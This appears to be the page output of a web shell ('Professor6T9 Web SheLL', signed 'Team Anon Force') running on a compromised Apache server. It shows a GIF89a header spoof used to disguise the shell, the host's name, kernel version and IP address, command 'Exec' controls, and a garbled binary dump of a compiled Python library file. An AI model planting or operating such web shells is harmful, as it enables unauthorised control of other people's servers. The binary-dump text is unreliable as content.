GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux host69.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Apache
68.65.123.79
/
proc
/
self
/
root
/
opt
/
cloudlinux
/
venv
/
lib
/
python3.11
/
site-packages
/
libfuturize
/
fixes
/
__pycache__
[ HOME ]
Exec
Submit
fix_input.cpython-311.pyc
� �|oi� � �X � d Z ddlZddlmZ G d� dej j j � � ZdS )aq Fixer for input. Does a check for `from builtins import input` before running the lib2to3 fixer. The fixer will not run when the input is already present. this: a = input() becomes: from builtins import input a = eval(input()) and this: from builtins import input a = input() becomes (no change): from builtins import input a = input() � N)�does_tree_importc � � � e Zd Z� fd�Z� xZS )�FixInputc �| �� t dd|� � rd S t t | � � � ||� � S )N�builtins�input)r �superr � transform)�self�node�results� __class__s ��m/builddir/build/BUILD/cloudlinux-venv-1.0.10/venv/lib/python3.11/site-packages/libfuturize/fixes/fix_input.pyr zFixInput.transform s<